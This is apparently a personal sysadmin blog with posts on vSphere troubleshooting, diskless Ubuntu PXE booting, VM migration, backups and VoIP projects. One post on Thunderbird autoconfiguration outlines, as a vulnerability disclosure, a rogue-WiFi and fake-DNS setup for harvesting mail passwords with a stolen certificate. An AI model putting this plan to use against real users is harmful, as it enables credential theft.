Friday 12 March 2021

Safe (?) password change on web pages - idea draft

What if we improve web forms for passwords change in the way described below to avoid password leak due to MITM or application/server side compromise

Idea:

When user input the password, browser will create a key-pair, protecting the private key with the password, and sends both private and public keys to the server.

When user accessing the page, server encrypts a token with the public key, and send both encrypted token and user's private key to the login page. When user inputs the password in the login form, browser unseals the private key with the password and decrypts the token, then use this token for authentication.

This way user's password never reaches the server, yet allows user authenticate with the password from any endpoint (no need to keep the private key)

There are downsides for this approach, but still interesting to consider. Actually, was this ever considered? This page is just to dump the idea on the paper.

Downside is - the private key can be easily collected and if weak passwords - relatively much easy to brute-force.

Monday 19 August 2019

MS Spear Phishing Attack simulator can potentially expose your users' passwords

Quite some time since my last post, but I had some pretty nice case recently, and because MS support seems not really interested to make deeper investigation by themselves, I wanted to put this piece of information somewhere, so others can also be aware about the potential security flaw in the tool called "Spear Phishing (Credentials Harvest) Account Breach" in the Attack simulator set of tools. You can find these tools on the Office 365 Security & Compliance portal in Threat management section.

First of all, what this tool is and what it does? In a very short, this tool allows you to send a specially crafted message to your users , which contains links to a quasi-malicious page disguising the genuine Office 365 login page. Why "quasi-"? Because in fact these pages are on the MS controlled domains, however not really used for real MS services. Example links from the tool: http://portal.docdelivaryapp.com, http://portal.hardwarecheck.net or http://portal.docstoreinternal.net.

Tuesday 20 October 2015

Insecure autoconfiguration lookups in Thunderbird

Recently I've tried an autoconfiguration feature in Thunderbird. When I was trying to figure out how it works and at what sequence it lookups for the configuration, I noticed that I didn't have SSL configured on my test web server, but Thunderbird received the configuration anyways.

Of course, I have some concerns with not using SSL by Thunderbird when it looks for the configuration. Here I have found a final (?) conclusion about using SSL:
DNS MX: Mail delivery between domains happens via DNS MX lookups,
 which are insecure. In other words, an attacker can already
 re-route and intercept new mails. The risk of interception during
 account setup is not larger than that. More importantly:
Guessed configs: An attacker can easily *prevent* connections,
 making the ispdb lookup (via https), isp fetch (via https) and
 heuristics for IMAP SSL servers and IMAP servers with secure auth mechs
 all fail, making us fall back to plaintext auth, and that's it, game over.
 Therefore, lookups via http don't add risk.
But I cannot agree with that, because intercepting emails is not the only target for the possible attack.

I've made an experiment, and create a network with a specially prepared DNS server, which redirects autoconfig.gmail.com and gmail,com to a local http server, with an autoconfig file that provides addresses to the wrong imap and smtp servers. Thus, when client tries to configure an account and just clicks "Continue" and "Done" without looking at the IMAP server address, an attacker can intercept his password if provide him with the server address for which he has an SSL certificate.

Good news: it's not so easy to use some pretty-looking addresses like the one on the screenshot. Because you need to have a trusted SSL certificate for this name. And if not use SSL in provided IMAP/SMTP configuration, Thunderbird will warn you with a big red window.

However, the attacker can use any server name if he has any stolen server certificate, and user can just don't pay appropriate attention to the values in the configuration.

Attack vector: force user to reconfigure their mail client with fake mail servers.
  • Prepare a router with a transparent proxy and/or a specially configured DNS service.
  • Router shall block all encrypted outgoing IMAP and SMTP connections.
  • Router will redirect all autoconfig.[domainname] and [domainname]/autocinfig... to a web server with a prepared fake configuration. (It can be a script that will response with the configuration for any domain requested)
  • Prepare a server with imap and smtp services with a stolen SSL certificate. DNS service will direct all requests to this server.
  • Put this setup with an open WiFi to any crowded place (hotels, hospitals, bus/train stations, etc.).
  • ... PROFIT

Of course, the configuration above is very simplified. Final configuration can be more intelligent and should allow user to browse Internet and use other services normally, so user will be sure that the only problem is a mail client.

Some users tend to re-configure from scratch their applications if something won't work. Of course, make this setup for collecting the Thunderbird users password only is not effective, but this could be a part of an attacker tools-set aimed to collects the data on public networks.

Tuesday 26 March 2013

vSphere allows use of a RAW-mapped logical drive on two VMs in wrong way

I didn't write anything on my blog for a quite some time, mostly because no really interesting things happened.

However, I face a weird vSphere behavior, after which I had to recover two file-servers. vSphere allowed me to RAW-map an FC-connected logical drive to a VM, despite it was already mapped to another one.

Well, it was our bad, that we didn't mark this logical drive properly, so when I took a look into DS Storage manager, it showed me the name of this drive something like "DATA3". After I asked my colleagues, they told me that this is probably an unused piece of the storage.

Actually I was going to create another logical drive in order to extend LVM volume on one of ours Linux file-servers. So, being completely sure that vSphere will not allow me to RAW-map an already used logical drive, I've mapped this one to the VM, and have extended the file-system, adding those 2TB.

Because this was a production server, I've performed online resize (reiserfs), after re-mounting in r/o mode of course.

Two days after, our monitoring system notified me, that there are serious FS errors on this server. Well, I was quite surprised, because I did extend reiserfs partitions online before with no issues. However, thinking that this is a bug of partially-supported (?) FS connected with resizing relatively big partitions (3TiB to 5TiB), I've unmounted this volume and have performed a reiserfsck.

After recovery has completed (few errors were fixed) I've mounted it back and was happy..... until next day...


Next day I was notified about errors again. wtf? Performing reiserfsck again... After it is finished I was recommended to... rebuild the whole tree... s**t! Almost 3TB of data, several millions of small files on a shared SATA storage....


OK, needed means needed... Starting rebuild. At the same moment I began to recover data from backup to another partition - in order to compare differences. And at this moment.......


- "Hello, I cannot access home folders. Can you check please?"
- "One moment..... Uhm.... what the...?! Seems like we have a H/W failure, I'll call you back.."

Home folders on a windows file-server disappeared.... Drive manager shows 2TiB drive with "Unknown" partition.......

It was a blood-freezing lightning in my head!


Switching to the vSphere client console, Windows VM settings -> Hard disk 2 ->  Manage Paths.... Error!


vCenter somehow "forgot" about this RAW-mapping, and treated the logical volume as a free! S**T!


Recovery procedure

At this moment the FS tree rebuild has been completed. Switching the recovered partition to read-only and starting rsync to a new one. Luckily we have enough free space.

Recovery from backup process took a lot of time, because (of course) data was fragmented on different tapes, so most of time has been spent on watching the status "changing tape"...

Windows server... Disaster... Precisely few days before (in order to optimize our backups) the old backup has been completely removed, and a new configuration was in progress of preparation. Shame on ours backup administrators...

So, after rsync process on the Linux server has been completed, I've disconnected the "problematic" drive from the Linux server and began to scan it on the Windows server with a tool named Restorer2000 ultimate. Despite I've choose to search only for NTFS partitions, after scan was finished I had a few thousands of potential FS structures. So it took some time until I find the proper one, and the recovery process has began.

I like NTFS for it's recovery possibilities. I was able to recover almost all of 1.6TB data, except several damaged files.

It was the same on the Linux file-server. Checksum comparison with the backup copy showed no differences.

At the end we loose not so much data as we could. I cannot say that it was a new experience to me, because I had even worse disasters in my practice. But (again) I make sure of necessity of the proper labels!

PS: Unfortunately, under high users pressure I had no time to record everything, so currently I have not enough data to submit a bug to VMWare. And I have no free resources to try to reproduce it.

Wednesday 5 December 2012

vSphere: A general system error occurred: Authorize Exception

This article may help you, if  solution from VMware Knowledge Base titled vCenter Server login fails with error: A general system error occurred: Authorize Exception not helps.

Symptoms (as from KB)

  • vCenter Server services are running, but a user that was previously able to log into vCenter Server no longer can
  • A local admin account is able to log in, but domain users cannot
  • You see this error:

    A general system error occurred: Authorize Exception

Additionally

  • Re-joining to domain don't help
  • Your primary (and secondary)  Domain Controllers which was used before were changed
  • C:\Program Files\VMware\Infrastructure\SSOServer\webapps\ims\WEB-INF\classes\krb5.conf contains wrong kdc entries.
    NB: Don't try to edit this file. It's automatically generated.

Cause

  •  Single-Sign-On service uses old DC name(s) when binds to Active Directory

Resolution

  1.  Install vSphere WebClient (don't forget that you should use admin@System-Domain username in order to connect it with SSO)
  2. Login to Web Client (https://vcenter.company.com:9443/vsphere-client/) using SSO admin account - admin@System-Domain
  3. On Administration page select Configuration menu under Sign-on and Discovery section
  4. Select the desired identity source (type - Active Directory), click Edit and write down (printscreen) all of the connection options
    Want to point out, that in my case, changing server URLs has no effect - no changes was saved after OK was pressed, so...
  5. Remove old identity source and add a new one, with the same parameters, but with new server URLs
  6. Done



Not important

To be honest - it was the most interesting issue for last couple of month. Mostly because any other issue I faced was already solved by someone else, so any problem was solved by following the obvious scenario: Problem -> logs - > google -> solution.

Now I have to switch on my imagination, because all solutions for "Authorize Exception" problem suggested to re-join to AD and/or fix AD/DNS problems. So we spent several hours fixing non-existing problems.

Well, we knew that Domain Controllers were changed, but we forgot completely about SSO, and nobody knew/remember that SSO uses it's own configuration (based on MIT kreberos) in order to bind to AD.

But even when the problem was located, I've spent next couple hours examining SSO logs and trying to find where AD discovery configuration can be changed. It's a pity, that it's not possible to configure by some CLI (at least I didn't find anything).

Hope this article helps. If so, I would appreciate if you consider to leave a comment.

Monday 19 November 2012

DELL Printer drivers for Linux (PPD)

Paradox: to install a DELL printer in Linux, you need to download drivers for Windows...

It's a pity, actually, that DELL ignores Linux users this way.

Today I've received a request, that users are not able to found drivers for their printers for Ubuntu. After almost an hour of searching for PPD files for different printers, I have finally found a way to get them without wasting time for searching.

Simply download the Windows driver from Dell, unpack it (although there is EXE extension, it's just an executable ZIP - I used 7zip), than search for *.pp_. In result you might find versions for different languages. Select file from directory with your language and unpack it under windows using the following command:

expand filename.pp_ filename.ppd

That's it. Now you can use this PPD file to install a printer under Ubuntu.

PS: Of course it works only for printers that supports PostScript.

Thursday 8 November 2012

VMWare: Remove datastore problem - "The resource xxxxxxxxxxxxxxxxxxxxx" is in use

Today I've faced a situation, when I removed all VMs from a datastore, but I still couldn't remove it because of the following error:

Status: The resource 'xxxxxxxxxxxxxxxxxx' is in use.

What I did first, is unmounting the datastore on all hosts in the cluster. This allowed me to find two hosts which has locked this datastore. While all other hosts allowed me to unmount the datastore with no problem, those two returned me an error:

Status: The resource 'xxxxxxxx' is in use.
Erorr Stack: Cannot unmount volume 'xxxxxxxx' because file system is busy. Correct the problem and retry the operation.

At this moment I've remembered, that some time ago in order to install some upgrade, I needed to configure a ScrathConfig option to use some external location on those two hosts.

Tip:
Go to "Inventory > Hosts and Clusters", select host that uses a datastore, goto "Configuration" tab, and click on "Advanced Settings" option. Find "ScratchConfig" section and change to something else (e.g. /tmp). Restart the host. Now you will be able to remove the datastore.

PS: Of course, this tip is a kind of useless if it was you who configured this option. But if you've got some legacy which you haven't configured before.

PPS: I didn't have this situation, but I'd advice to check also Syslog.global.logDir option.

VMWare Cluster - Remove datastore failed - The vSphere HA agent on host '10.0.0.1' failed to quiesce file activity on datastore '/vmfs/volumes/XXXXXXXXXXXXX'. To proceed with the operation to unmount or remove a datastore, ensure that the datastore is accessible, the host is reachable and its vSphere HA agent is running.

For the last few days I do some reorganization of our Virtual Infrastructure. One of the steps of this reorganization is upgrade from VMFS 3 to VMFS 5 for all our storages connected to the main HA cluster.

Although it is possible in ESXi to upgrade to VMFS5 in-place, I decided to completely remove and re-create storages. The main reason was that previously all arrays were sliced in several 2TiB(-1MiB) logical drives, and I wanted to create single logical unit for each storage subsystem.

But almost each time I tried to remove an old datastore from ESXi, I've received an error:


Status: The vSphere HA agent on host '10.0.0.1' failed to quiesce file activity on datastore '/vmfs/volumes/XXXXXXXXXXXXX'. To proceed with the operation to unmount or remove a datastore, ensure that the datastore is accessible, the host is reachable and its vSphere HA agent is running.


Tip:
Well, solution is quite simple. Just go to the host which generated this error (in my example it's 10.0.0.1) in "Inventory > Hosts and Clusters" view, and remove a the datastore from the Summary tab of that host.

Thursday 24 May 2012

Invisible symbols in sssd upstart config causes sssd to not start if /bin/sh is a link to /bin/bash

I've committed a bug for Ubuntu today. Hope they fix that soon, since we have not so much time before migrate all users from 10.04 to 12.04.

https://bugs.launchpad.net/ubuntu/+source/sssd/+bug/1003845

UPD: Quite impressive. It took only 2 hours after bug commit to release a fix! Bravo!

Friday 18 May 2012

How to setup diskless Ubuntu 12.04 with read-write root partition


Well, this how-to for the diskless Ubuntu setup is not usual. The main point is that all our infrastructure is based on CentOS, but sometimes (like in this case) we must support different Linux distributions for our clients. That is why all server-side configuration will be related to CentOS, and client-side to Ubuntu.

In difference to the official DisklessHowto, this one allows you to prepare a shared installation which can be used by any number of clients simultaneously. All changes to the mounted root will resist in ramfs, so no changes will be written to the NFS, and everything will be gone after restart. This feature in some (many) cases is treated as an advantage.

However, it is recommended to read  DisklessHowto from the Ubuntu site, since all basics related to network boot for Ubuntu described there much better. Also, I took some parts from their documentations to my howto. I believe they wouldn't mind.

Requirements

  • DHCP server
  • TFTP server
  • NFS server
 All my servers uses CentOS, so I will describe server-side the configuration only for this system.
Current server setup is based on CentOS 6.2 x86_64 with IP 192.168.1.10.

Step by step

I. DHCP

I will not describe basics of DHCP configuration, you can easily google it. In order to make PXE work, you need to put just these two option to your DHCP configuration:

filename pxelinux.0;
next-server 192.168.1.10;

Where next-server provides with an address of your TFTP server. It can be put in almost any section of dhcpd.conf: global, class, subnet, pool, group or host.

II. TFTP

1. Install tftp daemon and syslinux package. Syslinux is available from rpmforge.
# yum install tftp-server syslinux
# chkconfig tftp on
# service tftp start 

2. Copy pxelinux files to tftp directory:
# cp /usr/share/syslinux/pxelinux.0 /tftpboot/
# cp /usr/share/syslinux/vesamenu.c32 /tftpboot/

3. Configure pxelinux
# mkdir /tftpboot/pxelinux.cfg
# cat << EOF > /tftpboot/pxelinux.cfg/default
DEFAULT vesamenu.c32
TIMEOUT 600
ONTIMEOUT BootLocal
PROMPT 0
MENU TITLE My PXE Server (by TORNADO)
ALLOWOPTIONS 1
menu width 80
menu rows 15
MENU TABMSGROW 24
MENU MARGIN 10
NOESCAPE 1
LABEL BootLocal
    localboot 0
    TEXT HELP
    Boot to local hard disk
    ENDTEXT
LABEL UBUNTU_1204_DISKLESS
    MENU LABEL Ubuntu 12.04 (64-bit) DISKLESS
    KERNEL Ubuntu/12.04/x86_64/vmlinuz-3.2.0-20-generic
    APPEND root=/dev/nfs nfsroot=192.168.1.10:/srv/nfsroot/Ubuntu/12.04/x86_64,ro initrd=Ubuntu/12.04/x86_64/initrd.img-3.2.0-20-generic ip=dhcp aufs=tmpfs
    TEXT HELP
    Boot the Ubuntu 12.04 64-bit Diskless
    ENDTEXT
EOF 

III. NFS

1. Install nfs
# yum install nfs-utils

# chkconfig nfs on

# service nfs start

2. Add /srv/nfsroot to exports
# cat << EOF > /etc/exports
/srv/nfsroot *(ro,async,no_root_squash,no_subtree_check,no_all_squash)
EOF

3. Apply exports
# exportfs -r

IV. Prepare installation

1. Install Ubuntu
Generally you have two ways.
  1. Use debootstrap.
    I used this option to prepare some tiny installations (like network boot for number of POS terminals).
  2. Install the Ubuntu on the real or virtual system and copy it to NFS server.
    In this article I will follow this way, because I want to prepare a usual Ubuntu installation.
After system was installed and configured as you want, you need to prepare it for network boot.

2. Modify /etc/network/interfaces to set eth0 configuration type to manual:

iface eth0 inet manual

3. Configure /etc/fstab to be looking like this:
# /etc/fstab: static file system information.
#
#                
proc            /proc           proc    defaults        0       0
/dev/nfs       /               nfs    defaults          1       1

4.  Change the following options in /etc/initramfs-tools/initramfs.conf:
MODULES=netboot
BOOT=nfs
DEVICE=eth0
NOTE: If the client source installation you copied the files from should remain bootable and usable from local hard disk, restore the former BOOT=local and MODULES=most options you changed in /etc/initramfs-tools/initramfs.conf. Otherwise, the first time you update the kernel image on the originating installation, the initram will be built for network boot, giving you "can't open /tmp/net-eth0.conf" and "kernel panic". Skip this step if you no longer need the source client installation.

5. Add to /etc/initramfs-tools/modules line:
aufs

6. Copy aufs module to /etc/initramfs-tools/scripts/modules
$ sudo cp /lib/modules/$(uname -r)/kernel/ubuntu/aufs/aufs.ko /etc/initramfs-tools/scripts/modules

7. Copy the following script to /etc/initramfs-tools/scripts/init-bottom as 00_aufs_init (0755):
#!/bin/sh -e

case $1 in
  prereqs)
    exit 0
    ;;
esac

for x in $(cat /proc/cmdline); do
  case $x in
    root=*)
      ROOTNAME=${x#root=}
      ;;
    aufs=*)
      UNION=${x#aufs=}
        case $UNION in
          LABEL=*)
            UNION="/dev/disk/by-label/${UNION#LABEL=}"
            ;;
          UUID=*)
            UNION="/dev/disk/by-uuid/${UNION#UUID=}"
            ;;
        esac    
      ;;
  esac
done

echo "Union=$UNION"

if [ -z "$UNION" ]; then
    exit 0
fi

modprobe -b aufs && echo "OK: modprobe -b aufs" || echo "ERR: modprobe -b aufs"

# make the mount points on the init root file system
mkdir /aufs /ro /rw && echo "OK: mkdir /aufs /ro /rw" || echo "ERR: mkdir /aufs /ro /rw"

# mount read-write file system
if [ "$UNION" = "tmpfs" ]; then
  mount -t tmpfs rw /rw -o noatime,mode=0755 && echo "OK:  mount -t tmpfs rw /rw -o noatime,mode=0755 " || echo "ERR:  mount -t tmpfs rw /rw -o noatime,mode=0755"
else
  mount $UNION /rw -o noatime
fi

# move real root out of the way
mount --move ${rootmnt} /ro && echo "OK: mount --move ${rootmnt} /ro" || echo "ERR: mount --move ${rootmnt} /ro"

mount -t aufs aufs /aufs -o noatime,dirs=/rw:/ro=ro && echo "OK: mount -t aufs aufs /aufs -o noatime,dirs=/rw:/ro=ro" || echo "ERR: mount -t aufs aufs /aufs -o noatime,dirs=/rw:/ro=ro"

# test for mount points on union file system
[ -d /aufs/ro ] || mkdir /aufs/ro
[ -d /aufs/rw ] || mkdir /aufs/rw

mount --move /ro /aufs/ro && echo "OK: mount --move /ro /aufs/ro" || echo "ERR: mount --move /ro /aufs/ro"
mount --move /rw /aufs/rw && echo "OK: mount --move /rw /aufs/rw" || echo "ERR: mount --move /rw /aufs/rw"

# strip fstab off of root partition
grep -v $ROOTNAME /aufs/ro/etc/fstab > /aufs/etc/fstab

mount --move /aufs /root && echo "OK: mount --move /aufs /root" || echo "ERR: mount --move /aufs /root"

exit 0 

To be honest this script isn't mine. I found it some time ago and I don't remember where. If you are the author or you know who he is, please tell me in comments so I put your name here.

8. Build a new initrd image:
$ sudo update-initramfs -k $(uname -r) -c -b /root/

9. Now you can copy this all on server by executing the following command on client:

$ sudo rsync -a --exclude=tmp/* --exclude=proc/* --exclude=sys/* --exclude=dev/* / username@192.168.1.10:/srv/nfsroot/Ubuntu/12.04/x86_64/
Be careful with all slashes! rsync treats source or destination in different way if slash is omitted.
"username" must have write permissions to /srv/nfsroot/Ubuntu/12.04/x86_64.

10. Copy kernel and new initrd image to a proper folder on tftp. Run it ON THE SERVER
# cp /srv/nfsroot/Ubuntu/12.04/x86_64/boot/vmlinuz-$(uname -r) username@192.168.1.10:/tftpboot/Ubuntu/12.04/x86_64/
# cp /srv/nfsroot/Ubuntu/12.04/x86_64/root/initrd.img-$(uname -r) username@192.168.1.10:/tftpboot/Ubuntu/12.04/x86_64/


Notes

Remember, that changes to the root filesystem is limited by you RAM. This means that you will not be able to copy a 4GB video to /tmp if you have only 2GB of RAM.

I have prepared this post without access to my test environment, so some small mistakes are possible. If you find any, please comment.

Sunday 13 May 2012

Simple export of registry subkeys in HKCU\Software and HKLM\Software

I didn't write .cmd scripts for a very long time. But few weeks ago I faced random failures on my old laptop, so I was forced to migrate. Since the old one was intensively used for a year, a lot off unnecessary stuff was gathered. Smooth migration was rather impossible, so it was decided to reinstall system from scratch and install only the needed software.

I don't like different automatic migration software, so all applications were reinstalled and most of them were configured manually again. But some applications had to keep their old configuration, and this configuration was generally located in registry by the keys like HKLM\Software\<Application> and HKCU\Software\<Application>.

I found it very annoying to parse the list of subkeys (more than 100 applications were installed) looking for the ones I need, so I decided just to dump all "Software" keys to backup and restore just the needed pieces when needed. But if I dump "Software" to a single file, it will be the same issue to extract the needed pieces after.

To solve this problem I used a script that I wrote about 10 years ago, but it is actual even now. It is VERY simple, and I spent much more time to write this post than these two lines:

for /f "tokens=3 delims=\" %%i in ('reg query HKLM\Software') do reg export "HKLM\Software\%%i" "%%i_HKLM.reg" /y
for /f "tokens=3 delims=\" %%i in ('reg query HKCU\Software') do reg export "HKCU\Software\%%i" "%%i_HKCU.reg" /y

Thats it. Put those lines to some .cmd file, execute it, and you will have a bunch of .reg files per Software subkey both HKLM and HKCU.

Monday 16 April 2012

My Projects: Virtualization - part 2: P2V

Here is the next post in "My Projects" series, and the second one about Virtualization.

After migration from XEN was finished, we started to migrate all existing physical machines to virtual. Generally, this was one of the most light project for the last couple of years. First of all - VMware Converter 4.0 has been released, so all CentOS-es were migrated smoothly, without an issue. Second - while migrating VMs from XEN, I've collected so much experience, that some tasks which seemed very complicated before, now was a kind of obvious for me (e.g. like playing with LVM volumes).

What we had:

A bunch of  physical servers (IBM) with a range of OSes installed (mainly RH-based).

What was done:

  • Most of servers were migrated using VMware Converter.
  • Some of those old ones were migrated manually as in previous project.
  • Some servers were reinstalled as VMs and just services were migrated.

Result:

The result is pretty obvious for this kind of migration. However I'll provide a couple of benefits:
  • Increased reliability. Very small  system outage after H/W failure (That even happened twice. HA automatically migrated all VMs to the another ESXi host.)
  • Uninterrupted maintenance. I just migrate all VMs to another host in cluster during the upgrade.
  • Energy savings. I cannot provide exact quotas, but I was really surprised when review last report. We save really a lot.
  • Convenience. Add/remove some disk space/RAM/vCPUs is just several mouse clicks now.

Sunday 1 April 2012

My Projects: Virtualization - part 1: XEN to ESX

Here is the next post in "My Projects" series, and this time it is about the Virtualization.

Well, if think about that, I used virtualization for a very long time. First time I used jailed environments in FreeBSD about 10 years ago. After that it was VMware workstation server used mainly for home or some tests. But my first serious Project connected with virtualization took place just three years ago.

What we had:

When I moved to a main R&D center in Poland they had two or three XEN hosts for virtualization, and two new ESX servers with Standard license connected to a vCenter Server. Appreciating all benefits of using ESX it was decided to move all old services from the XEN-based virtualization to the ESX-based. In order to complete this task two more Standard licenses was bought and I was assigned to proceed with migration of 10-20 (don't really remember) of VMs.

The funny thing is that VMware Converter 4.0 has been released just in a few weeks after my project has been finished, but I don't feel sorry about that, because I've got the invaluable experience. Moreover, some of the migrated VMs couldn't be migrated with Converter because they were very old, like Fedora Core 1 for example.

Process:

Maybe, the way I did this migration looks too tricky, but it worked and I've migrated few tens of VMs from XEN. Most of guests in XEN had a single disk with /boot and / (root) primary partitions without LVM. Generally, in case with CentOS 5.x the migration looks like that:
Important note: This is just an example without the full description of commands used. In your case procedure can be completely different and single mistake can cause a real harm to your system!
  • Create a VM on ESX
  • Boot from newly created VM with CentOS CD/ISO in rescue mode with network enabled
  • Create all necessary partitions and mount them (e.g. /mnt/newsys)
  • On source VM allow ssh for root, or configure rsyncd
  • Copy all data from source (e.g. 192.168.1.10) to destination by executing rsync on a new VM:
    # rsync -ah --progress --delete --exclude="dev/" --exclude="proc/" --exclude="sys/" --exclude="tmp/" //192.168.1.10:/ /mnt/newsys/ 
  • Mount /dev /sys and /proc to /mnt/newsys
  • # chroot /mnt/newsys su -
  • Now it's time to change some values in fstab (to use /dev/sda instead of /dev/xvda) and grub.conf
  • After this is changed you must (in most cases) rebuild your initrd (mkinitrd tool) and reinstall grub (grub-install)
  • Temporary change the IP and boot the system on new VM
  • Stop all services on source guest and use rsync to copy the changes
  • Turn off the old VM and change back the IP on the new VM.
In most cases it worked, but there was number of cases when it won't work by different reasons (e.g. Fedora Core 1). So, I also had another way to make the same thing. It was more complicated, however it always works:
  • Create a VM on ESX with Virtual Disk of the same size or a bit more like it was on XEN
  • Boot from CentOS CD in rescue mode with network enabled
  • Start netcat to listen for a data an pipe it directly to the disk:
    # nc -l 2121 | dd bs=1M of=/dev/sda
  • On XEN host stop the source VM (wasn't necessary in all cases, but is more safe)
  • Send the contents of virtual disk to the remote VM booted in rescue mode like mentioned above:
    # dd if=/path/to/disk.img bs=1M|nc 123.123.123.123 2121
  • After all data is copied you can open /dev/sda with fdisk and extend second partition (by removing and adding it again with a bigger size)
    # fdisk /dev/sda
    : d (delete partition)
    : 2 (choose 2nd partition)
    : n (new partition)
    p (let it be primary partition)
    : w (write changes and exit)
  • After second partition raised you must use file-system tool to extend it (like resie2fs)
    # resize2fs /dev/sda2
  • Next you can mount this partition somewhere (don't forget to mount /boot after /), mount system FSes like /dev /sys and /proc, and chroot there.
  • Now it's time to change values in fstab (to use /dev/sda instead of /dev/xvda) and grub.conf
  • After this is changed you must (in most cases) rebuild your initrd (mkinitrd tool) and reinstall grub (grub-install)
  • Temporary change the IP and boot with the new system
  • Stop all services on source guest and use rsync to copy the changes
  • Turn off the old VM and change back the IP on the new VM.
Of course, now with VMware Converter this procedure is not more needed for a range of Linux servers, but I had pretty interesting experience.

Result:

When project was finished all XEN hosts were reinstalled with ESX Server and configured in a cluster with HA enabled.
In progress of migration the switching between old and new VM for most important services was about 1-2 minutes (sync differences and restart the networking services).
Some services was successfully migrated from old Linux versions to newest CentOS.
Was created a detailed procedure of migration, that allowed engineers in remote offices to complete migration as well.

Saturday 31 March 2012

My Projects: Backula backup system

This is third post in the "My Projects" series. This time, like my previous post, it is also dedicated to the World Backup Day. Two posts in a day - why not?

Although the project was about the same, there were few significant differences. 1st – 5 years difference (2009), and 2nd – mainly Linux environment.


It was a middle-size company. In a central office they had all things IT departments must have, including backup system (TSM). But I was hired in a remote division in another country, where was no System Administrator before me. There were many things to do, but today we are talking about backups.

What we had:

Three Linux servers, one external storage, limited budget.

Well, in situation with a single storage I have no possibility to protect data from a failure of that particular storage. But I split the discs in storage in two different arrays, and dedicate one of them for backups only.

This time I wanted something Enterprise-level, reliable and scalable. At that time Bacula fitted all my needs. The only problem was to get used to it. When I have opened User's manual and found out that there are 764 pages.... I was encouraged! Why? My previous job was quite boring so I was "hungry" for challenges like that. In a few days I was ready to propose a solution and install it in production.

Solution:

Quite simple, as reliable things should be
  • Bacula as a backup system
  • Standard schedule:
    • Daily incremental backups
    • Weekly differential backups
    • Monthly full backups
  • Workstation were also added if user desire

 Result:

Backup system is not intended to have configuration changes often. Configured once, it requires just to watch on daily notifications and make some periodical data restore.
After a new server added it was enough to create a single file with a list of directories to exclude from backup (/tmp, /media, /sys, etc. exluded by default).

Have a nice World Backup Day!

My Projects: History: backup scripts

This is second post in the "My Projects" series, and this time it dedicated to the World Backup Day.

Again, I will describe a project which I have quite some time ago, so some details could be missed.

It was 2004 and one of the first things I have decided to improve when come to new company was backups. Well, "improve" is not a correct word here, since there was nothing to improve – I had to create it from zero. It was quite surprising that 6-years old company doesn't have any backup system.

What we had:

No backup system. No money for that.

My experience at that time didn't allow me to propose any free backup solution, in the same time I was fascinated by writing different CMD scripts – I already did most of administrative tasks in windows using command line. So, instead of trying something that is ready, I decide to write my own bunch of scripts for backups.

Solution:


After a few days of work I've got something like following:

  • Nightly script scanned all folders listed in a text file.
  • All files with "Archive" attribute set were archived to a compressed file named like I_YYYYMMDD-HHSS.rar. After that the "Archive" attribute was cleared. This allowed me to have Incremental backups.
  • Once a month a Full backup was made.
  • Full backup older that 3 month was removed with all Incremental backups related.
  • Intelligent restore script allowed me to restore any file or folder from any day from last two month.
  • I was able to run the backup script at any moment, not just at night, and that allowed me to make several different backup copies during the day if needed.
To be honest – there is nothing special in this project. I can create something like that in few hours now. But it was quite interesting experience for a young admin that allows me to understand better how CMD scripts works.

Result:

Scripts-based backup system completely fulfilled our needs at that time. The restoring procedure was used many time during several years without a single failure.

Friday 30 March 2012

My Projects: My very first commercial project - VoIP

This is the first post in the "My Projects" series, and I decided to start with my very first project completed in a commercial organization.

It was the beginning of 2004 and my first (big enough) idea at the new place was to improve the telephony. Since pretty much time has gone, I cannot remember all details, but the main is the idea.

What we had:

Equipment:
  • 1 main office with Panasonic KX-TD500 with about 8 external lines and about 150 extensions.
  • 2 big branches with some other PBXes
  • about 5 small branches with or without dedicated phone lines.

Situation:
We didn't have any kind of IVR implemented, so any call to the office was served by two operators and forwarded manually. The main problem was that internal company calls was made also via PSTN, and our customers claimed quite often that they can't break through the busy lines.

The second problem was that even two operators at the same time cannot serve all flow of the calls, so some percent of inter-company calls was dropped, and of course there was quite important calls also.

The same problem was experienced by our two branches. Number of the phone pick-ups was about 85% from the calls initiated! 1 of 6 of our users or customers got "busy" during the day!

Along with that, all branches were connected to the main office other by SHDSL lines (double in some cases) and almost wasn't utilized (RDP traffic only).

Budget:
As usual: "Please do cheap, good and reliable".

Solution:

First we started with pretty cheap VoIP gateways from Dynamix. We had very good impression of their gateways with FXS port, and even installed them in 3 or 4 branches. But when we get to the next step of our project (integration with the existing telephone network) we have found out that FXO gateways connected to PBXes generates unacceptable echo. Support from Dynamix couldn't help us with that, so we had to resign from their hardware and started to search for another brand.

Next one was Planet. This time we've got VoIP gateways with FXO and FXS to test simultaneously. And this time tests was successful. We began to install our solution step by step, and in two month we have the following configuration:

Equipment:
  • Main office - Planet VoIP PBX (don't remember the model, but something like IPX-2000) with 2 modules 4 ports each connected to Panasonic TDS-500 to extension ports.
  • Big branches - Planet VoIP h323 gateways with 4 FXO ports connected to PBXes to extension ports
  • Small branches - Planet VoIP h323 gateways with 2 FXS with phones connected directly to them.

Gentoo  linux with GnuGK was used as a H323 gatekeeper (SIP wasn't really popular then).

The IVR has been configured on the Planet PBX and was also used for the external incoming call. There was a standard invitation like "Hello, this is company ABC, please enter extension or wait for an operator". But this made our users enormously happy.

Results:
After the Project was completed 100% of all calls initiated reached the target extensions or the operator.

Bills from the public telephony provider lowed by 2 (!) times. All new equipment payed off in several month.

Side effect:
One of operators was raised to the Office Manager, since there was no more need to hold two operators at the same time.

My Projects: prologue

I'm going to begin a series of posts aimed to create some kind of portfolio of projects in which I was involved.

I'm not sure there is a dedicated target of this action, but this will be useful first of all for me.

However, if somebody find some of the posts interesting, I just would be happy about that.

Currently I have 16 drafts, that means 16 project witch I found interesting enough to share. But for sure there will be more, because those 16 was remembered just in 10 minutes.

You can find them all under "My Projects" label.

Monday 20 February 2012

How to migrate data to the smaller disks using LVM.

Well, there could be any other subject for this post taken, because I'm going to write about the Physical Extents in LVM, and this could be used for different purposes.

My particular issue was related to the fact that if you want to use snapshots or cloning of a turned-on VM, you must be aware of some overhead for VMDK files. You can find more details in VMware KB 1012384: "Creating a snapshot for a virtual machine fails with the error: File is larger than maximum file size supported".

The problem was that when I try to clone a VM that have a virtual drive with size of 256GB (the maximum size for the specified datastore), I faced the following errors:

Create virtual machine snapshot VIRTUALMACHINE File <unspecified filename> is larger than the maximum size supported by datastore '<unspecified datastore>'
File is larger than the maximum size supported by datastore
 That was a server in production, so I couldn't just turn it off for 30 minutes. At this moment I realized, that I have number of servers with the problem like that and I can face the same problems sooner or later.

